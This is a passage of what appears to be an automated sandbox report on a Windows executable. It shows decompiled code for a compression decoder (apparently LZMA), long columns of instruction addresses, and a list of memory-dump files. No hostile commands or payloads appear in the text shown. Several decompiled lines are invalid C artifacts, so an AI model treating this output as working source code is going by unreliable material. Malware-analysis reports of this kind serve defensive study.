												__eax =  *(__ebp - 0x4c) << 4;
												__eflags = __eax;
												__eax =  *(__ebp - 0x58) + __eax + 4;
												goto L130;
											case 0x13:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													_t469 = __ebp - 0x58;
													 *_t469 =  *(__ebp - 0x58) + 0x204;
													__eflags =  *_t469;
													 *(__ebp - 0x30) = 0x10;
													 *(__ebp - 0x40) = 8;
													L144:
													 *(__ebp - 0x7c) = 0x14;
													goto L145;
												}
												__eax =  *(__ebp - 0x4c);
												__ecx =  *(__ebp - 0x58);
												__eax =  *(__ebp - 0x4c) << 4;
												 *(__ebp - 0x30) = 8;
												__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
												L130:
												 *(__ebp - 0x58) = __eax;
												 *(__ebp - 0x40) = 3;
												goto L144;
											case 0x14:
												 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
												__eax =  *(__ebp - 0x80);
												 *(_t613 - 0x88) = _t533;
												goto L1;
											case 0x15:
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xb;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
												goto L120;
											case 0x16:
												__eax =  *(__ebp - 0x30);
												__eflags = __eax - 4;
												if(__eax >= 4) {
													_push(3);
													_pop(__eax);
												}
												__ecx =  *(__ebp - 4);
												 *(__ebp - 0x40) = 6;
												__eax = __eax << 7;
												 *(__ebp - 0x7c) = 0x19;
												 *(__ebp - 0x58) = __eax;
												goto L145;
											case 0x17:
												L145:
												__eax =  *(__ebp - 0x40);
												 *(__ebp - 0x50) = 1;
												 *(__ebp - 0x48) =  *(__ebp - 0x40);
												goto L149;
											case 0x18:
												L146:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0x18;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t484 = __ebp - 0x70;
												 *_t484 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t484;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L148:
												_t487 = __ebp - 0x48;
												 *_t487 =  *(__ebp - 0x48) - 1;
												__eflags =  *_t487;
												L149:
												__eflags =  *(__ebp - 0x48);
												if( *(__ebp - 0x48) <= 0) {
													__ecx =  *(__ebp - 0x40);
													__ebx =  *(__ebp - 0x50);
													0 = 1;
													__eax = 1 << __cl;
													__ebx =  *(__ebp - 0x50) - (1 << __cl);
													__eax =  *(__ebp - 0x7c);
													 *(__ebp - 0x44) = __ebx;
													while(1) {
														 *(_t613 - 0x88) = _t533;
														goto L1;
													}
												}
												__eax =  *(__ebp - 0x50);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
												__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
												__eax =  *(__ebp - 0x58);
												__esi = __edx + __eax;
												 *(__ebp - 0x54) = __esi;
												__ax =  *__esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													__cx = __ax >> 5;
													__eax = __eax - __ecx;
													__edx = __edx + 1;
													__eflags = __edx;
													 *__esi = __ax;
													 *(__ebp - 0x50) = __edx;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L148;
												} else {
													goto L146;
												}
											case 0x19:
												__eflags = __ebx - 4;
												if(__ebx < 4) {
													 *(__ebp - 0x2c) = __ebx;
													L119:
													_t393 = __ebp - 0x2c;
													 *_t393 =  *(__ebp - 0x2c) + 1;
													__eflags =  *_t393;
													L120:
													__eax =  *(__ebp - 0x2c);
													__eflags = __eax;
													if(__eax == 0) {
														 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
														goto L170;
													}
													__eflags = __eax -  *(__ebp - 0x60);
													if(__eax >  *(__ebp - 0x60)) {
														goto L171;
													}
													 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
													__eax =  *(__ebp - 0x30);
													_t400 = __ebp - 0x60;
													 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
													__eflags =  *_t400;
													goto L123;
												}
												__ecx = __ebx;
												__eax = __ebx;
												__ecx = __ebx >> 1;
												__eax = __ebx & 0x00000001;
												__ecx = (__ebx >> 1) - 1;
												__al = __al | 0x00000002;
												__eax = (__ebx & 0x00000001) << __cl;
												__eflags = __ebx - 0xe;
												 *(__ebp - 0x2c) = __eax;
												if(__ebx >= 0xe) {
													__ebx = 0;
													 *(__ebp - 0x48) = __ecx;
													L102:
													__eflags =  *(__ebp - 0x48);
													if( *(__ebp - 0x48) <= 0) {
														__eax = __eax + __ebx;
														 *(__ebp - 0x40) = 4;
														 *(__ebp - 0x2c) = __eax;
														__eax =  *(__ebp - 4);
														__eax =  *(__ebp - 4) + 0x644;
														__eflags = __eax;
														L108:
														__ebx = 0;
														 *(__ebp - 0x58) = __eax;
														 *(__ebp - 0x50) = 1;
														 *(__ebp - 0x44) = 0;
														 *(__ebp - 0x48) = 0;
														L112:
														__eax =  *(__ebp - 0x40);
														__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
														if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
															_t391 = __ebp - 0x2c;
															 *_t391 =  *(__ebp - 0x2c) + __ebx;
															__eflags =  *_t391;
															goto L119;
														}
														__eax =  *(__ebp - 0x50);
														 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
														__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
														__eax =  *(__ebp - 0x58);
														__esi = __edi + __eax;
														 *(__ebp - 0x54) = __esi;
														__ax =  *__esi;
														__ecx = __ax & 0x0000ffff;
														__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
														__eflags =  *(__ebp - 0xc) - __edx;
														if( *(__ebp - 0xc) >= __edx) {
															__ecx = 0;
															 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
															__ecx = 1;
															 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
															__ebx = 1;
															__ecx =  *(__ebp - 0x48);
															__ebx = 1 << __cl;
															__ecx = 1 << __cl;
															__ebx =  *(__ebp - 0x44);
															__ebx =  *(__ebp - 0x44) | __ecx;
															__cx = __ax;
															__cx = __ax >> 5;
															__eax = __eax - __ecx;
															__edi = __edi + 1;
															__eflags = __edi;
															 *(__ebp - 0x44) = __ebx;
															 *__esi = __ax;
															 *(__ebp - 0x50) = __edi;
														} else {
															 *(__ebp - 0x10) = __edx;
															0x800 = 0x800 - __ecx;
															0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
															 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
															 *__esi = __dx;
														}
														__eflags =  *(__ebp - 0x10) - 0x1000000;
														if( *(__ebp - 0x10) >= 0x1000000) {
															L111:
															_t368 = __ebp - 0x48;
															 *_t368 =  *(__ebp - 0x48) + 1;
															__eflags =  *_t368;
															goto L112;
														} else {
															goto L109;
														}
													}
													__ecx =  *(__ebp - 0xc);
													__ebx = __ebx + __ebx;
													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
													__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
													 *(__ebp - 0x44) = __ebx;
													if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
														__ecx =  *(__ebp - 0x10);
														 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
														__ebx = __ebx | 0x00000001;
														__eflags = __ebx;
														 *(__ebp - 0x44) = __ebx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													if( *(__ebp - 0x10) >= 0x1000000) {
														L101:
														_t338 = __ebp - 0x48;
														 *_t338 =  *(__ebp - 0x48) - 1;
														__eflags =  *_t338;
														goto L102;
													} else {
														goto L99;
													}
												}
												__edx =  *(__ebp - 4);
												__eax = __eax - __ebx;
												 *(__ebp - 0x40) = __ecx;
												__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
												goto L108;
											case 0x1a:
												L56:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													 *(__ebp - 0x88) = 0x1a;
													goto L170;
												}
												__ecx =  *(__ebp - 0x68);
												__al =  *(__ebp - 0x5c);
												__edx =  *(__ebp - 8);
												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
												 *( *(__ebp - 0x68)) = __al;
												__ecx =  *(__ebp - 0x14);
												 *(__ecx +  *(__ebp - 8)) = __al;
												__eax = __ecx + 1;
												__edx = 0;
												_t192 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t192;
												goto L80;
											case 0x1b:
												L76:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													 *(__ebp - 0x88) = 0x1b;
													goto L170;
												}
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__edx =  *(__ebp - 8);
												__cl =  *(__eax + __edx);
												__eax =  *(__ebp - 0x14);
												 *(__ebp - 0x5c) = __cl;
												 *(__eax + __edx) = __cl;
												__eax = __eax + 1;
												__edx = 0;
												_t275 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t275;
												__eax =  *(__ebp - 0x68);
												 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												_t284 = __ebp - 0x64;
												 *_t284 =  *(__ebp - 0x64) - 1;
												__eflags =  *_t284;
												 *( *(__ebp - 0x68)) = __cl;
												L80:
												 *(__ebp - 0x14) = __edx;
												goto L81;
											case 0x1c:
												while(1) {
													L123:
													__eflags =  *(__ebp - 0x64);
													if( *(__ebp - 0x64) == 0) {
														break;
													}
													__eax =  *(__ebp - 0x14);
													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
													__eflags = __eax -  *(__ebp - 0x74);
													if(__eax >=  *(__ebp - 0x74)) {
														__eax = __eax +  *(__ebp - 0x74);
														__eflags = __eax;
													}
													__edx =  *(__ebp - 8);
													__cl =  *(__eax + __edx);
													__eax =  *(__ebp - 0x14);
													 *(__ebp - 0x5c) = __cl;
													 *(__eax + __edx) = __cl;
													__eax = __eax + 1;
													__edx = 0;
													_t414 = __eax %  *(__ebp - 0x74);
													__eax = __eax /  *(__ebp - 0x74);
													__edx = _t414;
													__eax =  *(__ebp - 0x68);
													 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
													 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
													 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
													__eflags =  *(__ebp - 0x30);
													 *( *(__ebp - 0x68)) = __cl;
													 *(__ebp - 0x14) = _t414;
													if( *(__ebp - 0x30) > 0) {
														continue;
													} else {
														L81:
														 *(__ebp - 0x88) = 2;
														goto L1;
													}
												}
												 *(__ebp - 0x88) = 0x1c;
												goto L170;
										}
									}
									L171:
									_t535 = _t534 | 0xffffffff;
									goto L172;
								}
							}
						}
					}
					goto L1;
				}
			}













                            0x00000000
                            0x0040711c
                            0x0040711c
                            0x00407120
                            0x0040712d
                            0x00407137
                            0x00000000
                            0x00407122
                            0x00407122
                            0x0040715d
                            0x00407160
                            0x00407163
                            0x00407166
                            0x00407166
                            0x00407169
                            0x00407170
                            0x00407175
                            0x00407056
                            0x00407059
                            0x004073cb
                            0x004073cb
                            0x004073cb
                            0x004073ce
                            0x004073ce
                            0x004073ce
                            0x004073d4
                            0x004073da
                            0x004073e0
                            0x004073fa
                            0x004073fd
                            0x00407403
                            0x0040740e
                            0x00407410
                            0x004073e2
                            0x004073e2
                            0x004073f1
                            0x004073f5
                            0x004073f5
                            0x0040741a
                            0x00000000
                            0x00000000
                            0x0040741c
                            0x00407420
                            0x004075cf
                            0x004075e5
                            0x004075ed
                            0x004075f4
                            0x004075f6
                            0x004075fd
                            0x00407601
                            0x00407601
                            0x0040742c
                            0x00407433
                            0x0040743b
                            0x0040743e
                            0x00407441
                            0x00407441
                            0x00407447
                            0x00407447
                            0x00406be3
                            0x00406be3
                            0x00406be3
                            0x00406bec
                            0x00000000
                            0x00000000
                            0x00406bf2
                            0x00000000
                            0x00406bfd
                            0x00000000
                            0x00000000
                            0x00406c06
                            0x00406c09
                            0x00406c0c
                            0x00406c10
                            0x00000000
                            0x00000000
                            0x00406c16
                            0x00406c19
                            0x00406c1b
                            0x00406c1c
                            0x00406c1f
                            0x00406c21
                            0x00406c22
                            0x00406c24
                            0x00406c27
                            0x00406c2c
                            0x00406c31
                            0x00406c3a
                            0x00406c4d
                            0x00406c50
                            0x00406c5c
                            0x00406c84
                            0x00406c86
                            0x00406c94
                            0x00406c94
                            0x00406c98
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00406c88
                            0x00406c88
                            0x00406c8b
                            0x00406c8c
                            0x00406c8c
                            0x00000000
                            0x00406c88
                            0x00406c62
                            0x00406c67
                            0x00406c67
                            0x00406c70
                            0x00406c78
                            0x00406c7b
                            0x00000000
                            0x00406c81
                            0x00406c81
                            0x00000000
                            0x00406c81
                            0x00000000
                            0x00406c9e
                            0x00406c9e
                            0x00406ca2
                            0x0040754e
                            0x00000000
                            0x0040754e
                            0x00406cab
                            0x00406cbb
                            0x00406cbe
                            0x00406cc1
                            0x00406cc1
                            0x00406cc1
                            0x00406cc4
                            0x00406cc8
                            0x00000000
                            0x00000000
                            0x00406cca
                            0x00406cd0
                            0x00406cfa
                            0x00406d00
                            0x00406d07
                            0x00000000
                            0x00406d07
                            0x00406cd6
                            0x00406cd9
                            0x00406cde
                            0x00406cde
                            0x00406ce9
                            0x00406cf1
                            0x00406cf4
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00406d39
                            0x00406d3f
                            0x00406d42
                            0x00406d4f
                            0x00406d57
                            0x004073cb
                            0x004073cb
                            0x00000000
                            0x00000000
                            0x00406d0e
                            0x00406d0e
                            0x00406d12
                            0x0040755d
                            0x00000000
                            0x0040755d
                            0x00406d1e
                            0x00406d29
                            0x00406d29
                            0x00406d29
                            0x00406d2c
                            0x00406d2f
                            0x00406d32
                            0x00406d37
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x004073ce
                            0x004073ce
                            0x004073d4
                            0x004073da
                            0x004073e0
                            0x004073fa
                            0x004073fd
                            0x00407403
                            0x0040740e
                            0x00407410
                            0x004073e2
                            0x004073e2
                            0x004073f1
                            0x004073f5
                            0x004073f5
                            0x0040741a
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00406d5f
                            0x00406d61
                            0x00406d64
                            0x00406dd5
                            0x00406dd8
                            0x00406ddb
                            0x00406de2
                            0x00406dec
                            0x004073cb
                            0x004073cb
                            0x004073cb
                            0x00000000
                            0x004073cb
                            0x004073cb
                            0x00406d66
                            0x00406d6a
                            0x00406d6d
                            0x00406d6f
                            0x00406d72
                            0x00406d75
                            0x00406d77
                            0x00406d7a
                            0x00406d7c
                            0x00406d81
                            0x00406d84
                            0x00406d87
                            0x00406d8b
                            0x00406d92
                            0x00406d95
                            0x00406d9c
                            0x00406da0
                            0x00406da8
                            0x00406da8
                            0x00406da8
                            0x00406da2
                            0x00406da2
                            0x00406da2
                            0x00406d97
                            0x00406d97
                            0x00406d97
                            0x00406dac
                            0x00406daf
                            0x00406dcd
                            0x00406dcf
                            0x00000000
                            0x00406db1
                            0x00406db1
                            0x00406db4
                            0x00406db7
                            0x00406dba
                            0x00406dbc
                            0x00406dbc
                            0x00406dbc
                            0x00406dbf
                            0x00406dc2
                            0x00406dc4
                            0x00406dc5
                            0x00406dc8
                            0x00000000
                            0x00406dc8
                            0x00000000
                            0x00406ffe
                            0x00407002
                            0x00407020
                            0x00407023
                            0x0040702a
                            0x0040702d
                            0x00407030
                            0x00407033
                            0x00407036
                            0x00407039
                            0x0040703b
                            0x00407042
                            0x00407043
                            0x00407045
                            0x00407048
                            0x0040704b
                            0x0040704e
                            0x0040704e
                            0x00407053
                            0x00000000
                            0x00407053
                            0x00407004
                            0x00407007
                            0x0040700a
                            0x00407014
                            0x004073cb
                            0x004073cb
                            0x004073cb
                            0x00000000
                            0x004073cb
                            0x00000000
                            0x00407068
                            0x0040706c
                            0x0040708f
                            0x00407092
                            0x00407095
                            0x0040709f
                            0x0040706e
                            0x0040706e
                            0x00407071
                            0x00407074
                            0x00407077
                            0x00407084
                            0x00407087
                            0x00407087
                            0x004073cb
                            0x004073cb
                            0x004073cb
                            0x00000000
                            0x004073cb
                            0x00000000
                            0x004070ab
                            0x004070af
                            0x00000000
                            0x00000000
                            0x004070b5
                            0x004070b9
                            0x00000000
                            0x00000000
                            0x004070bf
                            0x004070c1
                            0x004070c5
                            0x004070c5
                            0x004070c8
                            0x004070cc
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00407143
                            0x00407147
                            0x0040714e
                            0x00407151
                            0x00407154
                            0x00407149
                            0x00407149
                            0x00407149
                            0x00407157
                            0x0040715a
                            0x00000000
                            0x00000000
                            0x00407203
                            0x00407203
                            0x00407207
                            0x004075a5
                            0x00000000
                            0x004075a5
                            0x0040720d
                            0x00407210
                            0x00407213
                            0x00407217
                            0x0040721a
                            0x00407220
                            0x00407222
                            0x00407222
                            0x00407222
                            0x00407225
                            0x00407228
                            0x00000000
                            0x00000000
                            0x00406df8
                            0x00406df8
                            0x00406dfc
                            0x00407569
                            0x00000000
                            0x00407569
                            0x00406e02
                            0x00406e05
                            0x00406e08
                            0x00406e0c
                            0x00406e0f
                            0x00406e15
                            0x00406e17
                            0x00406e17
                            0x00406e17
                            0x00406e1a
                            0x00406e1d
                            0x00406e1d
                            0x00406e20
                            0x00406e23
                            0x00000000
                            0x00000000
                            0x00406e29
                            0x00406e2f
                            0x00000000
                            0x00000000
                            0x00406e35
                            0x00406e35
                            0x00406e39
                            0x00406e3c
                            0x00406e3f
                            0x00406e42
                            0x00406e45
                            0x00406e46
                            0x00406e49
                            0x00406e4b
                            0x00406e51
                            0x00406e54
                            0x00406e57
                            0x00406e5a
                            0x00406e5d
                            0x00406e60
                            0x00406e63
                            0x00406e7f
                            0x00406e82
                            0x00406e85
                            0x00406e88
                            0x00406e8f
                            0x00406e93
                            0x00406e95
                            0x00406e99
                            0x00406e65
                            0x00406e65
                            0x00406e69
                            0x00406e71
                            0x00406e76
                            0x00406e78
                            0x00406e7a
                            0x00406e7a
                            0x00406e9c
                            0x00406ea3
                            0x00406ea6
                            0x00000000
                            0x00406eac
                            0x00000000
                            0x00406eac
                            0x00000000
                            0x00406eb1
                            0x00406eb1
                            0x00406eb5
                            0x00407575
                            0x00000000
                            0x00407575
                            0x00406ebb
                            0x00406ebe
                            0x00406ec1
                            0x00406ec5
                            0x00406ec8
                            0x00406ece
                            0x00406ed0
                            0x00406ed0
                            0x00406ed0
                            0x00406ed3
                            0x00406ed6
                            0x00406ed6
                            0x00406ed6
                            0x00406edc
                            0x00000000
                            0x00000000
                            0x00406ede
                            0x00406ee1
                            0x00406ee4
                            0x00406ee7
                            0x00406eea
                            0x00406eed
                            0x00406ef0
                            0x00406ef3
                            0x00406ef6
                            0x00406ef9
                            0x00406efc
                            0x00406f14
                            0x00406f17
                            0x00406f1a
                            0x00406f1d
                            0x00406f1d
                            0x00406f20
                            0x00406f24
                            0x00406f26
                            0x00406efe
                            0x00406efe
                            0x00406f06
                            0x00406f0b
                            0x00406f0d
                            0x00406f0f
                            0x00406f0f
                            0x00406f29
                            0x00406f30
                            0x00406f33
                            0x00000000
                            0x00406f35
                            0x00000000
                            0x00406f35
                            0x00406f33
                            0x00406f3a
                            0x00406f3a
                            0x00406f3a
                            0x00406f3a
                            0x00000000
                            0x00000000
                            0x00406f75
                            0x00406f75
                            0x00406f79
                            0x00407581
                            0x00000000
                            0x00407581
                            0x00406f7f
                            0x00406f82
                            0x00406f85
                            0x00406f89
                            0x00406f8c
                            0x00406f92
                            0x00406f94
                            0x00406f94
                            0x00406f94
                            0x00406f97
                            0x00406f9a
                            0x00406f9a
                            0x00406fa0
                            0x00406f3e
                            0x00406f3e
                            0x00406f41
                            0x00000000
                            0x00406f41
                            0x00406fa2
                            0x00406fa2
                            0x00406fa5
                            0x00406fa8
                            0x00406fab
                            0x00406fae
                            0x00406fb1
                            0x00406fb4
                            0x00406fb7
                            0x00406fba
                            0x00406fbd
                            0x00406fc0
                            0x00406fd8
                            0x00406fdb
                            0x00406fde
                            0x00406fe1
                            0x00406fe1
                            0x00406fe4
                            0x00406fe8
                            0x00406fea
                            0x00406fc2
                            0x00406fc2
                            0x00406fca
                            0x00406fcf
                            0x00406fd1
                            0x00406fd3
                            0x00406fd3
                            0x00406fed
                            0x00406ff4
                            0x00406ff7
                            0x00000000
                            0x00406ff9
                            0x00000000
                            0x00406ff9
                            0x00000000
                            0x00407286
                            0x00407286
                            0x0040728a
                            0x004075b1
                            0x00000000
                            0x004075b1
                            0x00407290
                            0x00407293
                            0x00407296
                            0x0040729a
                            0x0040729d
                            0x004072a3
                            0x004072a5
                            0x004072a5
                            0x004072a5
                            0x004072a8
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00407395
                            0x00407399
                            0x004073bb
                            0x004073be
                            0x004073c8
                            0x004073cb
                            0x004073cb
                            0x004073cb
                            0x00000000
                            0x004073cb
                            0x004073cb
                            0x0040739b
                            0x0040739e
                            0x004073a2
                            0x004073a5
                            0x004073a5
                            0x004073a8
                            0x00000000
                            0x00000000
                            0x00407452
                            0x00407456
                            0x00407474
                            0x00407474
                            0x00407474
                            0x0040747b
                            0x00407482
                            0x00407489
                            0x00407489
                            0x00000000
                            0x00407489
                            0x00407458
                            0x0040745b
                            0x0040745e
                            0x00407461
                            0x00407468
                            0x004073ac
                            0x004073ac
                            0x004073af
                            0x00000000
                            0x00000000
                            0x00407543
                            0x00407546
                            0x00407447
                            0x00000000
                            0x00000000
                            0x0040717d
                            0x0040717f
                            0x00407186
                            0x00407187
                            0x00407189
                            0x0040718c
                            0x00000000
                            0x00000000
                            0x00407194
                            0x00407197
                            0x0040719a
                            0x0040719c
                            0x0040719e
                            0x0040719e
                            0x0040719f
                            0x004071a2
                            0x004071a9
                            0x004071ac
                            0x004071ba
                            0x00000000
                            0x00000000
                            0x00407490
                            0x00407490
                            0x00407493
                            0x0040749a
                            0x00000000
                            0x00000000
                            0x0040749f
                            0x0040749f
                            0x004074a3
                            0x004075db
                            0x00000000
                            0x004075db
                            0x004074a9
                            0x004074ac
                            0x004074af
                            0x004074b3
                            0x004074b6
                            0x004074bc
                            0x004074be
                            0x004074be
                            0x004074be
                            0x004074c1
                            0x004074c4
                            0x004074c4
                            0x004074c4
                            0x004074c4
                            0x004074c7
                            0x004074c7
                            0x004074cb
                            0x0040752b
                            0x0040752e
                            0x00407533
                            0x00407534
                            0x00407536
                            0x00407538
                            0x0040753b
                            0x00407447
                            0x00407447
                            0x00000000
                            0x0040744d
                            0x00407447
                            0x004074cd
                            0x004074d3
                            0x004074d6
                            0x004074d9
                            0x004074dc
                            0x004074df
                            0x004074e2
                            0x004074e5
                            0x004074e8
                            0x004074eb
                            0x004074ee
                            0x00407507
                            0x0040750a
                            0x0040750d
                            0x00407510
                            0x00407514
                            0x00407516
                            0x00407516
                            0x00407517
                            0x0040751a
                            0x004074f0
                            0x004074f0
                            0x004074f8
                            0x004074fd
                            0x004074ff
                            0x00407502
                            0x00407502
                            0x0040751d
                            0x00407524
                            0x00000000
                            0x00407526
                            0x00000000
                            0x00407526
                            0x00000000
                            0x004071c2
                            0x004071c5
                            0x004071fb
                            0x0040732b
                            0x0040732b
                            0x0040732b
                            0x0040732b
                            0x0040732e
                            0x0040732e
                            0x00407331
                            0x00407333
                            0x004075bd
                            0x00000000
                            0x004075bd
                            0x00407339
                            0x0040733c
                            0x00000000
                            0x00000000
                            0x00407342
                            0x00407346
                            0x00407349
                            0x00407349
                            0x00407349
                            0x00000000
                            0x00407349
                            0x004071c7
                            0x004071c9
                            0x004071cb
                            0x004071cd
                            0x004071d0
                            0x004071d1
                            0x004071d3
                            0x004071d5
                            0x004071d8
                            0x004071db
                            0x004071f1
                            0x004071f6
                            0x0040722e
                            0x0040722e
                            0x00407232
                            0x0040725e
                            0x00407260
                            0x00407267
                            0x0040726a
                            0x0040726d
                            0x0040726d
                            0x00407272
                            0x00407272
                            0x00407274
                            0x00407277
                            0x0040727e
                            0x00407281
                            0x004072ae
                            0x004072ae
                            0x004072b1
                            0x004072b4
                            0x00407328
                            0x00407328
                            0x00407328
                            0x00000000
                            0x00407328
                            0x004072b6
                            0x004072bc
                            0x004072bf
                            0x004072c2
                            0x004072c5
                            0x004072c8
                            0x004072cb
                            0x004072ce
                            0x004072d1
                            0x004072d4
                            0x004072d7
                            0x004072f0
                            0x004072f2
                            0x004072f5
                            0x004072f6
                            0x004072f9
                            0x004072fb
                            0x004072fe
                            0x00407300
                            0x00407302
                            0x00407305
                            0x00407307
                            0x0040730a
                            0x0040730e
                            0x00407310
                            0x00407310
                            0x00407311
                            0x00407314
                            0x00407317
                            0x004072d9
                            0x004072d9
                            0x004072e1
                            0x004072e6
                            0x004072e8
                            0x004072eb
                            0x004072eb
                            0x0040731a
                            0x00407321
                            0x004072ab
                            0x004072ab
                            0x004072ab
                            0x004072ab
                            0x00000000
                            0x00407323
                            0x00000000
                            0x00407323
                            0x00407321
                            0x00407234
                            0x00407237
                            0x00407239
                            0x0040723c
                            0x0040723f
                            0x00407242
                            0x00407244
                            0x00407247
                            0x0040724a
                            0x0040724a
                            0x0040724d
                            0x0040724d
                            0x00407250
                            0x00407257
                            0x0040722b
                            0x0040722b
                            0x0040722b
                            0x0040722b
                            0x00000000
                            0x00407259
                            0x00000000
                            0x00407259
                            0x00407257
                            0x004071dd
                            0x004071e0
                            0x004071e2
                            0x004071e5
                            0x00000000
                            0x00000000
                            0x00406f44
                            0x00406f44
                            0x00406f48
                            0x0040758d
                            0x00000000
                            0x0040758d
                            0x00406f4e
                            0x00406f51
                            0x00406f54
                            0x00406f57
                            0x00406f5a
                            0x00406f5d
                            0x00406f60
                            0x00406f62
                            0x00406f65
                            0x00406f68
                            0x00406f6b
                            0x00406f6d
                            0x00406f6d
                            0x00406f6d
                            0x00000000
                            0x00000000
                            0x004070cf
                            0x004070cf
                            0x004070d3
                            0x00407599
                            0x00000000
                            0x00407599
                            0x004070d9
                            0x004070dc
                            0x004070df
                            0x004070e2
                            0x004070e4
                            0x004070e4
                            0x004070e4
                            0x004070e7
                            0x004070ea
                            0x004070ed
                            0x004070f0
                            0x004070f3
                            0x004070f6
                            0x004070f7
                            0x004070f9
                            0x004070f9
                            0x004070f9
                            0x004070fc
                            0x004070ff
                            0x00407102
                            0x00407105
                            0x00407105
                            0x00407105
                            0x00407108
                            0x0040710a
                            0x0040710a
                            0x00000000
                            0x00000000
                            0x0040734c
                            0x0040734c
                            0x0040734c
                            0x00407350
                            0x00000000
                            0x00000000
                            0x00407356
                            0x00407359
                            0x0040735c
                            0x0040735f
                            0x00407361
                            0x00407361
                            0x00407361
                            0x00407364
                            0x00407367
                            0x0040736a
                            0x0040736d
                            0x00407370
                            0x00407373
                            0x00407374
                            0x00407376
                            0x00407376
                            0x00407376
                            0x00407379
                            0x0040737c
                            0x0040737f
                            0x00407382
                            0x00407385
                            0x00407389
                            0x0040738b
                            0x0040738e
                            0x00000000
                            0x00407390
                            0x0040710d
                            0x0040710d
                            0x00000000
                            0x0040710d
                            0x0040738e
                            0x004075c3
                            0x00000000
                            0x00000000
                            0x00406bf2
                            0x004075fa
                            0x004075fa
                            0x00000000
                            0x004075fa
                            0x00407447
                            0x004073ce
                            0x004073cb
                            0x00000000
                            0x00407120

                            Memory Dump Source
                            • Source File: 00000000.00000002.322657168.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000000.00000002.322651210.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.322670175.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.322678692.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
